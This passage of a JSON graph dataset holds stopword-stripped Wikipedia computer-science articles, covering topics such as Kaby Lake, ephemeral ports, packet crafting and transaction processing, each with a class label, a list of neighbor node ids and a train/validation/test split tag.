    "text": "Microsoft_Mahjong:microsoft mahjong microsoft mahjong formerly mahjong titans taipei computer game version mahjong solitaire published microsoft version titled mahjong titans developed oberon games included windows vista windows 7 except starter home basic editions takes advantage new graphical user interface gui windows vista includes features tile set background choices windows vista builds 5219 5231 5259 game known shanghai solitaire game make windows 8 however standalone version developed arkadium published microsoft studios downloaded windows store free charge older version game known taipei bundled microsoft entertainment pack 1 best microsoft entertainment pack version included 32767 possible configurations player choice six tile layouts cat turtle crab dragon fortress spider stylized portrayal respective object animal background image chosen five different options four tile sets including traditional mahjong tiles variations fuller coloring larger print alternative pastel tile set entirely different picture theme games entirely random always least one pair within five tiles topmost five tiles turtle layout often two pairs algorithm tile organization positions tiles mostly paired level otherwise matching tile available accessible position one level check ensure matching tile positioned beneath partner since every tile 3 partners enough prove game impossible solve newer version microsoft mahjong numerous layouts improved graphics sound internet features set daily challenges reward user badges completed xbox live integration",
    "neighbors": [
      11270,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      9812,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10989,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      6462,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 5644,
    "label": 2,
    "text": "Keith_Bergelt:keith bergelt keith daniel bergelt born september 11 1958 american corporate executive former u.s. diplomat ceo open invention network responsible coordinating establishment maintenance patent ‘ ‘ no-fly ” zone around linux responsible safeguarding open competitive landscape key technology markets back-office transaction processing mission critical applications mobile communications/smartphones desktop computing bergelt born new york city raised village bayville new york north shore long island attended st. boniface martyr school sea cliff new york graduate locust valley high school high school classmate eileen chamberlain donahoe u.s ambassador un human rights council geneva switzerland bergelt holds degrees duke university ’ trinity college ab dedman school law southern methodist university jd edhec business school theseus mba addition studied management insead institut national des telecommunications int france economics technology policy university san francisco mclaren graduate school business upon graduation law school entered public service held diplomatic postings un new york city american embassy tokyo japan 12-year public service career also lived san francisco california washington d.c colleague tennis partner u.s. treasury secretary tim geithner time together american embassy tokyo early 1990s berlin wall fell wake collapse soviet union bergelt left government service embarked private sector career c-level strategy consulting focused innovation sri consulting menlo park ca sri consulting co-founded first strategy consulting practice area intellectual asset management major strategy consulting firm practice enabled companies develop strategies effectively build manage leverage value codified patents trademarks copyrights non-codified knowledge know-how etc intellectual capital licensing joint ventures donation abandonment creation spin-outs spin-ups spin-ins uniquely suited monetize corporate intangible assets bergelt brought motorola corporation schaumburg il establish serve general manager strategic intellectual asset management business unit focused distilling value motorola ’ intellectual property addition served director technology strategy tenure motorola following experience motorola coincident departure bob galvin motorola board directors recruited kelso company new york-based private equity firm manage ip strategy business development licensing ip-based portfolio company – cambridge display technology cdt – cambridge england establishing strategy licensing program cdt kelso bergelt engaged texas pacific group tpg full-time advisor technology investment group recruited principal financial group establish run first-of-its-kind ip fund financial services advisory firm focused transforming ip viable source collateral fourth lending vertical complement asset-based lending backed property/plant/equipment accounts receivable inventory tenure ceo paradox capital bergelt worked professionals banking ip law raise 350mm capital enabled paradox pioneer emergence ip viable asset class asset-based lending obviate necessity second lien lending ip-rich companies bergelt recruited ibm red hat sony nec philips novell serve ceo open invention network pro-competitive defensive patent management organization established enable freedom operate linux support democratization innovation occasioned open source projects linux 'bergelt chief executive officer open invention network since 2008 responsible defending integrity linux ecosystem previously bergelt criticized microsoft several times behavior towards open source community microsoft changed behavior embraced open source community signed open invention network cross license bergelt pleased company also interviewed linux.com 2008 linuxworld expo",
    "neighbors": [
      1026,
      7938,
      7812,
      8326,
      4360,
      4493,
      4367,
      8848,
      657,
      10642,
      1939,
      2195,
      1813,
      2581,
      3478,
      6808,
      11155,
      7450,
      10780,
      1694,
      6302,
      7584,
      802,
      3618,
      5410,
      6691,
      6947,
      8354,
      8355,
      4011,
      5931,
      8364,
      9646,
      1717,
      823,
      9660,
      2109,
      11069,
      10687,
      10817,
      10822,
      8263,
      843,
      5067,
      589,
      6352,
      4177,
      11602,
      8147,
      8787,
      4437,
      11643,
      6489,
      3802,
      4831,
      9696,
      1761,
      11232,
      4841,
      9455,
      7793,
      1394,
      1396,
      3189,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 5645,
    "label": 3,
    "text": "Steamroller_(microarchitecture):steamroller microarchitecture amd steamroller family 15h microarchitecture developed amd amd apus succeeded piledriver beginning 2014 third-generation bulldozer-based microarchitecture steamroller apus continue use two-core modules predecessors aiming achieving greater levels parallelism steamroller still features two-core modules found bulldozer piledriver designs called clustered multi-thread cmt meaning one module equal dual-core processor focus steamroller greater parallelism improvements center independent instruction decoders core within module 25 maximum width dispatches per thread better instruction schedulers improved perceptron branch predictor larger smarter caches 30 fewer instruction cache misses branch misprediction rate reduced 20 dynamically resizable l2 cache micro-operations queue internal register resources improved memory controller amd estimated improvements increase instructions per cycle ipc 30 compared first-generation bulldozer core maintaining piledriver high clock rates decreased power consumption final result 9 single-threaded ipc improvement 18 multi-threaded ipc improvement piledriver steamroller microarchitecture cpus well graphics core next microarchitecture gpus paired together apu lines support features specified heterogeneous system architecture 2011 amd announced third-generation bulldozer-based line processors 2013 next generation bulldozer working title using 28 nm manufacturing process 21 september 2011 leaked amd slides indicated third generation bulldozer core codenamed steamroller january 2014 first kaveri apus became available starting may 2015 till march 2016 new apus launched kaveri-refresh codenamed godavari november 2013 amd confirmed would update fx series 2014 neither socket am3+ version receive steamroller version new socket amd server roadmaps 2014 showed however plans steamroller opteron products cancelled likely due poor energy efficiency achieved generation bulldozer architecture energy efficiency greatly increased following generation excavator exceeded jaguar performance per watt approximately doubled performance/watt steamroller example 20.74 pt/w vs 10.85 pt/w comparing similar mobile apus using rough arbitrary metrics",
    "neighbors": [
      3586,
      8322,
      5380,
      9092,
      9475,
      6151,
      8327,
      10375,
      638,
      398,
      6033,
      9369,
      7963,
      9500,
      4767,
      2719,
      9122,
      5541,
      11047,
      2088,
      2094,
      11183,
      6705,
      9400,
      833,
      6978,
      7234,
      9541,
      11080,
      2764,
      9551,
      5329,
      7122,
      9427,
      980,
      9428,
      473,
      5859,
      7783,
      5356,
      1005,
      9582,
      9964,
      1137,
      2549,
      11130,
      4603,
      3070
    ],
    "mask": "None"
  },
  {
    "node_id": 5646,
    "label": 4,
    "text": "McCumber_cube:mccumber cube 1991 john mccumber created model framework establishing evaluating information security information assurance programs known mccumber cube security model depicted three-dimensional rubik cube-like grid concept model developing information assurance systems organizations must consider interconnectedness different factors impact devise robust information assurance program one must consider security goals program see also goals relate specifically various states information reside system full range available security safeguards must considered design mccumber model helps one remember consider important design aspects without becoming focused one particular i.e. relying exclusively technical controls expense requisite policies end-user training per john mccumber website idea push back advance security art support structured methodology functions independent technology evolution basis methodology inter-relationship among confidentiality integrity availability storage transmission processing applying policy procedures human side technology",
    "neighbors": [
      7979
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5647,
    "label": 2,
    "text": "Apple_Push_Notification_service:apple push notification service apple push notification service commonly referred apple notification service apns platform notification service created apple inc. enables third party application developers send notification data applications installed apple devices notification information sent include badges sounds newsstand updates custom text alerts first launched ios 3 june 17 2009 apns support local applications later added mac os x api beginning release mac os x 10.7 lion support website notifications later added release mac os x 10.9 mavericks apple announced service june 9 2008 original stated release september however stated scott forstall ios 3.0 preview event march 17 2009 rollout delayed decision restructure apns scalability purposes due allegedly overwhelming response announcement apns events forstall stated push notifications better conserve battery background processes used pull technology receiving notifications apns first launched together ios 3.0 june 17 2009 release ios 5.0 included notification center adding support receiving reading local notifications single place apns also added api mac os x 10.7 lion developers could begin updating third-party applications start utilizing service support later improved os x 10.8 mountain lion introduction notification center ios 5.0 improvement allowed users manage read received notifications single location release os x 10.9 mavericks included safari 7.0 added support accepting receiving apns notifications websites user granted permission 2014 maximum size allowed notification payload sent binary interface increased 256 bytes 2 kilobytes december 2015 new http/2 provider api released apple effectively replacing now-legacy binary interface maximum notification payload size allowed using http/2 api 4 kilobytes october 22 2014 apple announced would cease support ssl 3.0 october 29 2014 due poodle attack gained public attention shortly date developers required use tls protocol send notification using apns",
    "neighbors": [
      10755,
      9732,
      4615,
      7697,
      1042,
      7701,
      11289,
      6186,
      4139,
      6700,
      4657,
      1074,
      8754,
      9784,
      8253,
      3657,
      9802,
      8783,
      5713,
      4180,
      3670,
      1623,
      3672,
      4184,
      10838,
      2141,
      4702,
      3681,
      9826,
      2149,
      8806,
      3691,
      8303,
      2673,
      6771,
      2676,
      7292,
      2686,
      6783,
      9343,
      10878,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      5784,
      1177,
      11414,
      3228,
      2207,
      1699,
      11430,
      5292,
      8877,
      1710,
      2735,
      3248,
      7857,
      3766,
      2232,
      9912,
      4283,
      3772,
      7869,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      3286,
      9430,
      3289,
      3293,
      4318,
      6884,
      231,
      9451,
      1772,
      2288,
      7928,
      8441,
      7420,
      7422,
      11521,
      2819,
      1796,
      1290,
      3338,
      9999,
      784,
      10512,
      4888,
      5912,
      11037,
      10023,
      811,
      3371,
      4399,
      7983,
      10036,
      7991,
      9529,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      4933,
      7496,
      9035,
      6993,
      1878,
      4957,
      6495,
      9063,
      4457,
      3948,
      10608,
      2439,
      6023,
      6539,
      7052,
      9100,
      9109,
      3483,
      1439,
      2979,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      6093,
      7118,
      464,
      8662,
      9174,
      3035,
      4571,
      7133,
      9182,
      4068,
      5093,
      6628,
      487,
      2023,
      10221,
      7154,
      5619,
      11257,
      7163,
      4607
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5648,
    "label": 0,
    "text": "Automated_Lip_Reading:automated lip reading automated lip reading alr software technology developed speech recognition expert frank hubner video image person talking analysed software shapes made lips examined turned sounds sounds compared dictionary create matches words spoken technology used successfully analyse silent home movie footage adolf hitler taken eva braun bavarian retreat berghof video words included documentary titled hitler private world revealed studios 2006 source new technology catches hitler guard",
    "neighbors": [
      1890,
      10557,
      4381,
      3946
    ],
    "mask": "Test"
  },
  {
    "node_id": 5649,
    "label": 3,
    "text": "Kaby_Lake:kaby lake kaby lake intel codename processor microarchitecture intel announced august 30 2016 like preceding skylake kaby lake produced using 14 nanometer manufacturing process technology breaking intel previous tick–tock manufacturing design model kaby lake represents optimized step newer process-architecture-optimization model kaby lake began shipping manufacturers oems second quarter 2016 mobile chips started shipping kaby lake desktop chips officially launched january 2017 august 2017 intel announced kaby lake refresh kaby lake r marketed 8th generation mobile cpus breaking long cycle architectures matched corresponding generations cpus skylake anticipated succeeded 10 nanometer cannon lake announced july 2015 cannon lake delayed second half 2017 meantime intel released fourth 14 nm generation october 5 2017 named coffee lake kaby lake first intel platform lack official driver support versions windows older windows 10 furthermore windows update disabled windows 8.1 earlier although enthusiast-created modification released disabled check allowed continue work platform previous intel processors 8088 banias dothan conroe sandy bridge ivy bridge skylake kaby lake development led intel israeli team based haifa intel israel development centers manager ran senderovitz said started project thinking basic improvements previous generation began looking things differently lot innovation determination achieved major improvements added performance seventh generation chips improved 12 applications 19 internet use compared sixth generation chips third-party benchmarks confirm percentages far gaming concerned built improved 14 nm process 14ff+ kaby lake features faster cpu clock speeds clock speed changes higher turbo frequencies beyond process clock speed changes little cpu architecture changed skylake resulting identical ipc instructions per clock kaby lake features new graphics architecture improve performance 3d graphics 4k video playback adds native hdcp 2.2 support along fixed function decode h.264 hevc main main10/10-bit vp9 10-bit 8-bit video hardware encode supported h.264 hevc main10/10-bit vp9 8-bit video vp9 10-bit encode supported hardware opengl 4.6 opencl 2.1 supported kaby lake first core architecture support hyper-threading pentium-branded desktop cpu sku kaby lake also features first overclocking-enabled i3-branded cpu kaby lake features cpu core performance per mhz skylake features specific kaby lake include microsoft officially supports kaby lake computers running windows 10 per support policies windows update blocks updates installed kaby lake systems running versions older windows 10 support position intel provides chipset drivers windows 10 enthusiast-created modification released disabled windows update check allowed windows 8.1 earlier continue updated platform kaby lake critical flaw short loops may cause unpredictable system behavior issue fixed motherboard manufacturer releases bios update fix thermal design power tdp designed maximum heat generated chip running specific workload base clock single microarchitecture heat produced increases voltage frequency thermal design limit also limit maximum frequency processor however cpu testing binning allows products lower voltage/power particular frequency higher frequency within power limit desktop processors mobile processors features common desktop kaby lake cpus maximum pcie lanes 16 release date q1 2017 late 2016 reported intel working processor family codenamed “ kaby lake r ” r stands refresh august 21 2017 eighth generation mobile cpus announced first products released four kaby lake r processors 15w tdp marketing distinct previous generational changes core product line new generation coincided new microarchitecture intel stated 8th generation would based multiple microarchitectures including kaby lake coffee lake cannon lake maximum number pcie lanes 8 release date q1 2018 august 28 2018 intel announced refreshed lineup ultra low power mobile kaby lake cpus moniker amber lake",
    "neighbors": [
      3459,
      5380,
      3973,
      8325,
      9092,
      9095,
      5386,
      9611,
      4108,
      9741,
      398,
      8719,
      5649,
      7313,
      5523,
      6804,
      8851,
      4886,
      407,
      3352,
      9111,
      9500,
      5883,
      10361,
      2339,
      10019,
      1832,
      2088,
      10669,
      2350,
      9391,
      10675,
      4276,
      1461,
      10548,
      2237,
      5309,
      8125,
      8126,
      833,
      6339,
      5444,
      9541,
      10440,
      3403,
      1998,
      2638,
      977,
      2514,
      5073,
      2516,
      5329,
      5844,
      10966,
      4444,
      2525,
      7134,
      1119,
      1000,
      7657,
      4204,
      5356,
      8684,
      5871,
      9582,
      10734,
      9970,
      499,
      8820,
      3317,
      4217,
      4603,
      10620,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 5650,
    "label": 7,
    "text": "Yandex_Disk:yandex disk yandex.disk cloud service created yandex lets users store files “ cloud ” servers share others online service based syncing data different devices yandex.disk launched english june 2012 storage — users upload save files restrictions length time files stored files uploaded encrypted connection checked antivirus syncing — files synced user internet-enabled devices either web interface yandex.disk mobile/desktop application sharing — users share file download links others preview — built-in flash player lets people preview songs integration yandex services — lets people manage files yandex services yandex.mail yandex.narod sent received mail attachments automatically placed one folder easily searched webdav support — means files managed application supporting webdav protocol yandex.disk api used software program supporting webdav web version located inside yandex.mail “ files ” tab applications available following operating systems mobile version included part yandex.mail mobile app lets users view files yandex.disk upload files mobile device download files use offline email file download links yandex.disk api also supports webdav protocol allows third-party applications upload files yandex cloud storage service yandex.disk api makes easier sync info smartphones tablet pcs laptops desktop computers api lets developers yandex.disk api documentation released april 28 2012 service provided completely free charge everyone starts free allowance 10gb easily increased 512 mb increments referring others additional maximum 10 gb 20 gb total also additional storage paid monthly yearly basis choose enable device auto-uploads using yandex.disk app android ios granted additional 32 gb free storage increases maximum storage 10 gb 42 gb april 5 2012 – beta version service launched may 3 2012 – first api open source client launched may 24 2012 – flash player introduced web interface “ save disk ” button added shared file page allows users share files published others account june 26 2012 – english turkish versions available",
    "neighbors": [
      4194,
      4869,
      2694,
      4710,
      6565,
      7238,
      4970,
      10054,
      10185,
      823,
      6797,
      4623,
      4911,
      7983,
      10161,
      1239,
      2267
    ],
    "mask": "Test"
  },
  {
    "node_id": 5651,
    "label": 9,
    "text": "Off-side_rule:off-side rule computer programming language said adhere off-side rule blocks language expressed indentation term coined peter j. landin offside rule football contrasted free-form languages notably curly-bracket programming languages indentation meaningful indent style matter convention code formatting peter j. landin article called next 700 programming languages defined off-side rule thus non-whitespace token left first token previous line taken start new declaration following example indentation blocks python colons part python language syntax readability necessary implement off-side rule python rule taken define boundaries statements rather declarations python also suspends off-side rule within brackets statement within brackets continues brackets match mismatch off-side rule implemented lexical analysis phase python increasing indentation results lexer outputting indent token decreasing indentation results lexer outputting dedent token tokens correspond opening brace codice_1 closing brace codice_2 languages use braces blocks means phrase grammar depend whether braces indentation used requires lexer hold state namely current indentation level thus detect changes indentation changes thus lexical grammar context-free – indent/dedent depend contextual information previous indentation level primary alternative delimiting blocks popularized c ignore whitespace mark blocks explicitly curly brackets i.e. codice_1 codice_2 delimiter allows freedom – developer might choose indent small pieces code like break continue statements – sloppily indented code might lead reader astray lisp s-expression based languages differentiate statements expressions parentheses enough control scoping statements within language curly bracket languages whitespace mostly ignored reader i.e. read function whitespace used separate tokens explicit structure lisp code allows perform automatic indentation acts visual cue human lisp readers another alternative block begin end explicit keywords example algol 60 descendant pascal blocks start keyword codice_5 end keyword codice_6 languages pascal means newlines important unlike curly brace languages indentation basic fortran blocks begin block name codice_7 end block name prepended codice_8 e.g. codice_9 fortran every block also unique block name adds additional level explicitness lengthy code algol 68 bourne shell sh bash similar ending block usually given name block written backward e.g. codice_10 starts switch statement spans matching codice_11 similarly conditionals codice_12 ... codice_13 ... codice_14 ... codice_15 ... codice_16 loops codice_17 ... codice_18 ... codice_19 algol68 codice_17 ... codice_18 ... codice_22 bash interesting variation made modula-2 pascal-like language away difference one multiline blocks allows block opener codice_1 codice_24 skipped function level block requiring block terminating token codice_2 codice_8 also fixes dangling else custom codice_6 token placed indentation level rest block giving blockstructure readable one advantage fortran approach improves readability long nested otherwise complex code group outdents closing brackets alone provide contextual cues blocks closed necessitating backtracking closer scrutiny debugging addition languages allow suffix end-like keywords improve cues codice_28 versus codice_29 however modern code editing applications often provide visual indicators features folding assist drawbacks",
    "neighbors": [
      9345,
      2691,
      5635,
      9224,
      2316,
      5395,
      9626,
      1947,
      3613,
      6558,
      4770,
      10786,
      3876,
      4398,
      2352,
      3120,
      5680,
      9780,
      1333,
      1591,
      4410,
      443,
      191,
      963,
      8262,
      8775,
      9926,
      2505,
      1610,
      1611,
      4042,
      8524,
      5845,
      7421,
      477,
      7395,
      228,
      7805,
      4838,
      6502,
      10083,
      8554,
      9330,
      9331,
      10739,
      3960,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5652,
    "label": 5,
    "text": "Ephemeral_port:ephemeral port ephemeral port short-lived transport protocol port internet protocol ip communications ephemeral ports allocated automatically predefined range ip stack software ephemeral port typically used transmission control protocol tcp user datagram protocol udp stream control transmission protocol sctp port assignment client end client–server communication well-known port server servers ephemeral ports may also used port assignment server end communication done continue communications client initially connected one server well-known service listening ports file transfer protocol ftp remote procedure call rpc applications two protocols behave manner note term server includes workstations running network services receive connections initiated clients e.g remote desktop protocol allocations temporary valid duration communication session completion timeout communication session ports become available reuse since ports used per request basis also called dynamic ports internet assigned numbers authority iana suggests range 49152 65535 2+2 2−1 dynamic private ports many linux kernels use port range 32768 61000 freebsd used iana port range since release 4.6 previous versions including berkeley software distribution bsd use ports 1024 5000 ephemeral ports microsoft windows operating systems xp use range 1025–5000 ephemeral ports default windows vista windows 7 server 2008 use iana range default windows server 2003 uses range 1025–5000 default microsoft security update ms08-037 2008 installed uses iana range default windows server 2008 exchange server 2007 installed default port range 1025–60000 addition default range versions windows since windows 2000 option specifying custom range anywhere within 1025–65535 certain server software used uses non ephemeral custom port ranges initiating connections needs ensured configuration custom port range ephemeral port range overlap",
    "neighbors": [
      5472,
      8386,
      7364,
      4074,
      4490,
      10924,
      6797,
      6993,
      11413,
      1942,
      10747,
      6650,
      5531,
      3006,
      9151
    ],
    "mask": "Train"
  },
  {
    "node_id": 5653,
    "label": 5,
    "text": "SMART_Multicast:smart multicast smart multicast experimental method secure reliable ip multicast allows user forward ip datagrams unlimited group receivers see article multicast general discussion subject article specifically smart ip multicast ip multicast successfully deployed private controlled networking environments example ip fiber cable tv operators educational institutions significant on-campus student housing financial sector applications stock tickers hoot-n-holler systems however ip multicast slow adopted interdomain routing environment current interdomain infrastructure lacks necessary tools efficiently handle packet loss security needed create functional business model smart ip multicast experimental protocol enables interdomain transmission secure reliable ip multicast thus overcoming challenges deploying wide area interdomain ip multicast transmissions smart ip multicast reduces complexity deploying wide area ip multicast way mftp multicast file transfer protocol accomplishes goal file transfer namely allowing security reliability full interoperability ip multicast file distribution successful use ip multicast within campus commercial networks file distribution used variant experimental protocol mftp multicast file transfer protocol mftp secure reliable runs top ip multicast protocol like mftp smart multicast wrapper runs top ip multicast taking advantage ip multicast efficiency smart multicasts secure reliable provide bi-directional feedback info see rfc3170 ip multicast applications challenges solutions smart supports mbone like implementation multicast sites use dynamically allocated multicast tunnels smart takes advantage simple self implementing multicast protocol level escalation four forms ip addressing unique properties",
    "neighbors": [
      10402,
      1411,
      7908,
      2509,
      1197,
      11413,
      10461
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5654,
    "label": 7,
    "text": "P-GRADE_Portal:p-grade portal p-grade grid portal software web portals manage life-cycle executing parallel application grid computing developed laboratory parallel distributed systems lpds hungarian academy sciences hungary building onto gridsphere portal framework p-grade portal hides details grid systems high-level interfaces integrated middleware offers portlet based access following services p-grade portal allows multi-user development execution workflows also provides support workflow level grid interoperation portal supports various middleware technologies including globus toolkit egee lcg glite advanced resource connector p-grade portal developed gnu general public license online tutorials videos documents available p-grade portal site release p-grade grid portal version 2.10 2.9 version introduced features portable batch system pbs platform lsf cluster support edges 3g bridge resource support local ps port support extended nordugrid arc support p-grade portal served grid communities research industry providing access grids including application specific portals created adding application specific portlets p-grade portal omitting generic purpose portlets hiding underlying workflow within application specific portlet applications include grid application support centre gasuc established 2008 within laboratory parallel distributed systems supported part european grid infrastructure gasuc provides assistance porting legacy applications onto grid infrastructures",
    "neighbors": [
      3331,
      5956,
      1862,
      198,
      11658,
      5612,
      7983,
      8370,
      11353,
      6042
    ],
    "mask": "Test"
  },
  {
    "node_id": 5655,
    "label": 3,
    "text": "Minimal_instruction_set_computer:minimal instruction set computer minimal instruction set computer misc processor architecture small number basic operations corresponding opcodes instruction sets commonly stack-based rather register-based reduce size operand specifiers stack machine architecture inherently simpler since instructions operate top-most stack entries result stack architecture overall smaller instruction set smaller faster instruction decode unit overall faster operation individual instructions separate stack definition misc architecture misc architecture defined respect number instructions supported also instruction pipelines misc rule tend simple instruction pipelines branch prediction out-of-order execution register renaming speculative execution broadly exclude cpu classified misc architecture system first digital computers implemented instruction sets modern definition minimal instruction set computers among various computers illiac ordvac compatible instruction sets early stored-program computers disadvantage misc instructions tend sequential dependencies reducing overall instruction-level parallelism misc architectures much common forth programming language java virtual machine weak providing full instruction-level parallelism probably commercially successful misc original inmos transputer architecture floating-point unit however many eight-bit microcontrollers embedded computer applications fit category stereo spacecraft includes two p24 misc cpus two cpu24 misc cpus",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      1798,
      1801,
      6924,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      372,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      8143,
      466,
      9172,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 5656,
    "label": 2,
    "text": "Installwatch:installwatch installwatch program designed make easier catalog maintain software installed source code originally developed stand-alone project installwatch exists primarily component checkinstall installwatch originally written pancrazio 'ezio de mauro 1998 development later taken felipe sánchez installwatch allows user monitor files directories created installation software package real-time allows user know exactly installed system purposes documentation later removal software used installwatch limited usefulness create log installation process felipe sánchez created checkinstall takes information generated installwatch uses create installable package used linux distribution makes use debian slackware red hat package management systems use checkinstall largely superseded installwatch alone installwatch merged checkinstall distribution older stand-alone versions installwatch still remain primarily historical educational purposes present version installwatch packaged checkinstall incompatible current version gnu coreutils core utilities installwatch ca n't monitor changes made coreutils rendering logs incomplete depending software package may completely invalidate information provided installwatch thus program depends checkinstall issue documented slackware 12 changelog prompted checkinstall removal distribution august 3 2007 problem explained detailed felipe sánchez checkinstall mailing list updated version checkinstall promised coming soon address issue meantime workaround suggested",
    "neighbors": [
      5923,
      10149,
      5096,
      9455,
      5397
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5657,
    "label": 4,
    "text": "Packet_crafting:packet crafting packet crafting technique allows network administrators probe firewall rule-sets find entry points targeted system network done manually generating packets test network devices behaviour instead using existing network traffic testing may target firewall ids tcp/ip stack router component network packets usually created using packet generator packet analyzer allows specific options flags set created packets act packet crafting broken four stages packet assembly packet editing packet play packet decoding tools exist stages tools focussed one stage others ostinato try encompass stages packet assembly creation packets sent popular programs used packet assembly hping nemesis ostinato cat karat packet builder libcrafter libtins pcapplusplus scapy wirefloss yersinia packets may protocol designed test specific rules situations example tcp packet may created set erroneous flags ensure target machine sends reset command firewall blocks response packet editing modification created captured packets involves modifying packets manners difficult impossible packet assembly stage modifying payload packet programs scapy ostinato netdude allow user modify recorded packets fields checksums payloads quite easily modified packets saved packet streams may stored pcap files replayed later packet play packet replay act sending pre-generated captured series packets packets may come packet assembly editing captured network attacks allows testing given usage attack scenario targeted network tcpreplay common program task since capable taking stored packet stream pcap format sending packets original rate user-defined rate scapy also supports send functions replay saved packets/pcap ostinato added support pcap files version 0.4 packet analyzers also capable packet replay packet decoding capture analysis network traffic generated packet play order determine targeted network response scenario created packet play response must captured packet analyzer decoded according appropriate specifications depending packets sent desired response may packets returned connection successfully established among others famous tools task wireshark scapy",
    "neighbors": [
      9440,
      418,
      8998,
      1064,
      2569,
      842,
      6345,
      7901,
      11486,
      8694,
      5245,
      11006
    ],
    "mask": "Test"
  },
  {
    "node_id": 5658,
    "label": 3,
    "text": "Transaction_processing:transaction processing transaction processing information processing computer science divided individual indivisible operations called transactions transaction must succeed fail complete unit never partially complete example purchase book online bookstore exchange money form credit book credit good series related operations ensures get book bookstore gets money however single operation series fails exchange entire exchange fails get book bookstore get money technology responsible making exchange balanced predictable called transaction processing transactions ensure data-oriented resources permanently updated unless operations within transactional unit complete successfully combining set related operations unit either completely succeeds completely fails one simplify error recovery make one application reliable transaction processing systems consist computer hardware software hosting transaction-oriented application performs routine transactions necessary conduct business examples include systems manage sales order entry airline reservations payroll employee records manufacturing shipping since though necessarily transaction processing today interactive term often treated synonymous online transaction processing transaction processing designed maintain system integrity typically database modern filesystems known consistent state ensuring interdependent operations system either completed successfully canceled successfully example consider typical banking transaction involves moving 700 customer savings account customer checking account transaction involves least two separate operations computer terms debiting savings account 700 crediting checking account 700 one operation succeeds books bank balance end day must therefore way ensure either operations succeed fail never inconsistency bank database whole transaction processing links multiple individual operations single indivisible transaction ensures either operations transaction completed without error none operations completed errors occur others attempted transaction-processing system rolls back operations transaction including successful ones thereby erasing traces transaction restoring system consistent known state processing transaction began operations transaction completed successfully transaction committed system changes database made permanent transaction rolled back done transaction processing guards hardware software errors might leave transaction partially completed computer system crashes middle transaction transaction processing system guarantees operations uncommitted transactions cancelled generally transactions issued concurrently overlap i.e need touch portion database create conflicts example customer mentioned example 150 savings account attempts transfer 100 different person time moving 100 checking account one succeed however forcing transactions processed sequentially inefficient therefore concurrent implementations transaction processing programmed guarantee end result reflects conflict-free outcome could reached executing transactions sequentially order property called serializability example means matter transaction issued first either transfer different person move checking account succeeds one fails basic principles transaction-processing systems however terminology may vary one transaction-processing system another terms used necessarily universal transaction-processing systems ensure database integrity recording intermediate states database modified using records restore database known state transaction committed example copies information database prior modification transaction set aside system transaction make modifications sometimes called image part transaction fails committed copies used restore database state transaction began also possible keep separate journal modifications database management system sometimes called images required rollback failed transactions useful updating database management system event database failure transaction-processing systems provide database management system fails entirely must restored recent back-up back-up reflect transactions committed since back-up made however database management system restored journal images applied database rollforward bring database management system date transactions progress time failure rolled back result database consistent known state includes results transactions committed moment failure cases two transactions may course processing attempt access portion database time way prevents proceeding example transaction may access portion x database transaction b may access portion database point transaction tries access portion database transaction b tries access portion x deadlock occurs neither transaction move forward transaction-processing systems designed detect deadlocks occur typically transactions cancelled rolled back started different order automatically deadlock n't occur sometimes one deadlocked transactions cancelled rolled back automatically restarted short delay deadlocks also occur among three transactions transactions involved difficult detect point transaction processing systems find practical limit deadlocks detect systems commit rollback mechanisms available undesirable compensating transaction often used undo failed transactions restore system previous state jim gray defined properties reliable transaction system late 1970s acronym acid — atomicity consistency isolation durability transaction changes state atomic either happen none happen changes include database changes messages actions transducers consistency transaction correct transformation state actions taken group violate integrity constraints associated state even though transactions execute concurrently appears transaction others executed either transaction completes successfully commits changes database survive failures retain changes transaction processing benefits standard transaction-processing software ibm information management system first developed 1960s often 